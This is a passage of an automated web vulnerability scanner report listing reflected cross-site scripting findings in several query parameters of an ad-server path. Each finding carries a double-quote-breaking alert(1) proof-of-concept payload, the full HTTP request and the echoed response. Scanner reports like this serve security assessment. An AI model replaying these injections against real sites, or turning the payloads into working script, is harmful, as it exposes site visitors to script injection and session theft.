1.56. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e518"-alert(1)-"dd64696a94d was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:53 GMT
Expires: Mon, 22 Nov 2010 00:15:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
log/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&
...[SNIP]...

1.57. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770c4"-alert(1)-"c8ab4cf7ab6 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:42 GMT
Expires: Mon, 22 Nov 2010 00:15:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/information-analytics.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=
...[SNIP]...

1.58. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb33"-alert(1)-"b08b2fbdfeb was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:13 GMT
Expires: Mon, 22 Nov 2010 00:14:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vrm/pref/263
...[SNIP]...

1.59. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24bbb"-alert(1)-"7c6d580aa85 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:03 GMT
Expires: Mon, 22 Nov 2010 00:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=
...[SNIP]...

1.60. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b3"-alert(1)-"70e6e14f3b9 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7025
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:11:35 GMT
Expires: Mon, 22 Nov 2010 00:16:35 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9http://www.ibm.com/systems/smarter/questions/process-transformation.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=108AU0QW&cn=telecom");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

1.61. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbfb"-alert(1)-"835e9647437 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:36 GMT
Expires: Mon, 22 Nov 2010 00:09:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/t%3B231155693%3B2-0%3B0%3B54795159%3B4307-300/250%3B37853710/37871528/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=
...[SNIP]...

1.62. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc4f"-alert(1)-"72623d3e15c was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:20 GMT
Expires: Mon, 22 Nov 2010 00:10:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
ick%3Bh%3Dv8/3a5a/17/14a/%2a/z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21
...[SNIP]...

1.63. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7295"-alert(1)-"6e36561f977 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:12 GMT
Expires: Mon, 22 Nov 2010 00:11:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http:
...[SNIP]...

1.64. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61d8"-alert(1)-"ec4061367c2 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:21 GMT
Expires: Mon, 22 Nov 2010 00:09:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAA
...[SNIP]...

1.65. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ca9"-alert(1)-"ec39cdc4ef5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:53 GMT
Expires: Mon, 22 Nov 2010 00:14:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_busines
...[SNIP]...

1.66. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f2e"-alert(1)-"4dc1a9e7e19 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

